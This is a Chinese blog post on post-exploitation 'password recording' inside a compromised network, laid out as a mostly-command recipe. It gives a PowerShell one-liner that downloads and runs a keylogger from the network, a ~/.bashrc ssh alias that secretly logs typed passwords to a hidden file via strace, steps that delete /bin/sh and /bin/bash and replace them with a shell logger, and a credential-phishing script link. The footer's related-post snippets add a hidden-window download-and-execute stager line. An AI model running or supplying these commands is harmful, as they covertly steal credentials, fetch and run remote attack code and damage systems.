内网渗透----密码记录

最新推荐文章于 2024-08-22 20:45:26 发布
最新推荐文章于 2024-08-22 20:45:26 发布
阅读量873 收藏
点赞数
分类专栏: # 内网技巧 文章标签: 密码记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/84350392
版权

Windows Powershell

iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-Keystrokes.ps1’); Get-Keystrokes –Logpath C:\log.txt

在这里插入图片描述

Linux alias

在~/.bashrc下添加如下一行:

alias ssh='strace -o /var/tmp/.syscache-`date +'%Y-%m-%d+%H:%m:%S'`.log -s 4096 ssh'

使更改生效:

source ~/.bashrcapt-get install strace        //若缺少此软件,需要安装

当有用户使用ssh命令时:
在这里插入图片描述

会生成一个Log文件:

在这里插入图片描述
但是内容特别多,需要筛选:

cat .syscache-2018-11-20+14\:11\:54.log  | grep  "read(4"

在这里插入图片描述
sh2log(这个软件好像有毒。。。)
登录ubuntu主机,下载sh2log:

wget http://packetstorm.foofus.com/UNIX/loggers/sh2log-1.0.tgz

在这里插入图片描述
解压压缩包

tar -xvf sh2log-1.0.tgz

在这里插入图片描述

Cd进入sh2log-1.0文件夹 安装libx11-dev

cd sh2log-1.0/
sudo apt install libx11-dev

在这里插入图片描述

安装完成后,编译sh2log:

make linux

在这里插入图片描述
新建一个shell脚本,脚本内容如下:

sudo mkdir /bin/shells/
sudo cp -p /bin/{sh,bash} /bin/shells/
sudo rm -f /bin/{sh,bash}
sudo cp -p sh2log /bin/bash
sudo cp -p sh2log /bin/sh 
./sh2logd

在这里插入图片描述

保存脚本,添加执行权限:

chmod +x  ./1.sh

运行脚本:

./1.sh

在这里插入图片描述

输入bash,打开一个新的shell,随意输入一些命令 之后使用文件夹中的parser工具,

./parser sh2log-xxxxx.bin

在这里插入图片描述

Invoke-CredentialsPhish.ps1

下载地址:

https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-CredentialsPhish.ps1

远程下载执行过程略
在弹出的对话框中输入正确的凭证
在这里插入图片描述

查看结果

在这里插入图片描述
Edit

浅笑⁹⁹⁶
关注
专栏目录
内网渗透-域内的权限维持
lza20001103的博客
10-01 1040
域内的权限维持 文章目录域内的权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下域内的权限维持,权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
内网渗透-Windows内网渗透
lza20001103的博客
08-15 1889
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
内网密码抓取
jjjj1029056414的博客
11-13 1261
主要抓的内网机器hash明文密码这些
内网渗透TIPS总结
Javachichi的博客
03-13 750
更可靠:更少的宕机时间。可以简单的把域理解成升级版的“工作组”,相比工作组而言,它有一个更加严格的安全管理控制机制,如果你想访问域内的资源,就必须拥有一个合法的身份登陆到该域中,而你对该域内的资源拥有什么样的权限,还需要取决于你在该域中的用户身份。通过域成员主机,定位出 域控制器 IP 及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性,定位出域管理员登陆过的主机 IP,设法从域成员主机内存中 dump 出域管理员密码,进而拿下域控制器、渗透整个内网。
【网络安全渗透测试零基础入门必知必会】之什么是内网渗透(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
08-22 921
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段内网渗透与防御第1篇。内网渗透是指攻击者已经进入了目标系统的内部网络,通过侧信道攻击、横向渗透等方式进一步控制系统,获取敏感信息或执行恶意操作的过程。内网渗透与普通的外网渗透的主要区别在于,内网渗透中攻击者已经通过某种方式获取了系统的访问权限,可以直接对系统进行攻击,而无需绕过防御措施。内网渗透的难度相对较小,因为它避免了需要从外部突破防御措施的步骤。
实战 | 手把手教你如何进行内网渗透
jennycisp的博客
06-25 1943
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解。
内网渗透-Linux内网渗透
lza20001103的博客
04-14 1974
内网渗透-Linux内网渗透
cs在内网横向的使用(靶机)
sweetie 的博客
11-02 1630
1.cs上线目标 (1)设置监听器 添加监听 (2) 上线目标 如果目标可以出外网,我们可以使用让目标访问我们的cs服务器上的恶意代码,并下载执行,比较常见的就是使用如下图所使用的模块 根据目标的版本位数,选择是否要用 x64,点击执行后会出现如图所示窗口 复制代码(这里要选择x64的payload) powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:///b'))"
内网渗透讲义-精选.zip
最新发布
09-24
内容涵盖了域结构、AD和DC的管理、内网跨边界应用、用户HASH抓取与破解、密码记录工具、常见漏洞扫描、第三方网络服务攻击(如SQL Server、MySQL、Web服务等)、ARP和DNS欺骗攻击等内容,并给出了具体的工具使用及...
内网渗透-域环境的搭建
lza20001103的博客
05-08 1530
域环境的搭建
内网渗透-内网信息搜集
cdyunaq的博客
03-25 1316
前言 当我们能访问到⽬标内⽹任何资源之后,我们就可以对 ⽬标内⽹进⾏更深层次的信息搜集⽐如:主机收集、IP 段搜集、端⼝开放服务、Web 资产数量、漏洞类型。接下来是一些工具的食用姿势,仅供参考。 假设我们已经获取到 web-2012 的权限,接下来如何对内⽹进⾏信息搜集,内⽹扫描。 信息收集 主机存活探测 基于netbios的内网存活主机发现 netbios简介 IBM公司开发,主要用于数十台计算机的小型局域网。该协议是一种在局域网上的程序可以 使用的应用程序编程接口(API),为程序提供了
我的powershell免杀之路
mingyqf的博客
05-17 1945
我的powershell免杀之路 ​ 原创 tubai
Powershell免杀
mingyqf的博客
05-11 2449
Powershell免杀 本文作者:Chenw 本文链接:https://www.cnblogs.com/chen-w/p/14726549.html 0x01 前言 前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。 后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。 0x02 Powershell免杀思路 先介绍一下powershell木马最常用的方式
powershell IEX
qq_28808697的博客
11-12 6183
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); 该命令将#{remote_script}加载到内存,并没有把该脚本下载到本地。
远控免杀从入门到实践(6)-代码篇-Powershell
weixin_46236101的博客
03-13 1119
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实.
windows反弹shell复现
热门推荐
就是我的博客
04-06 1万+
windows反弹shell 简介: reverse shell(反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
Ladon for PowerShell远程加载教程
K8哥哥
08-08 731
前言 本文仅是PowerLadon远程加载例子,并不代表只有这些功能。详情参考完整文档 脚本可直接远程内存加载使用无须免杀,或者有些人比较喜欢的所谓无文件渗透 完整文档:http://k8gege.org/Ladon 架设WEB服务器 使用命令 Ladon web 800 架设一个WEB服务器,用于远程下载脚本 实战可架设在VPS,或者架设在目标内网机器(因为有机器不能出网) 将脚本放在WEB目录下即可,当然大家也可以用IIS或APACHE搭建WEB 远程加载MS17010漏洞扫描 powershell
PowerShell渗透--PowerSploit(WEB安全攻防)
小英雄颂人头
03-03 3158
PowerSploit是基于PowerShell的后渗透框架,包含很多PowerShell攻击脚本,主要用于渗透中的信息侦查,权限提升,权限维持,github地址为:github.com/PowerShellMafia/PowerSploit 安装 下载程序目录 git clone https://github.com/PowerShellMafia/PowerSploi...
黑客内网渗透技术解析
"内网渗透常用手法" 内网渗透是黑客攻击的一种策略,通常发生在攻击者已经突破了外层防御并进入内部网络之后。在安全措施日益增强的今天,外网渗透变得越来越困难,因此内网渗透成为黑客寻找敏感信息和控制目标系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值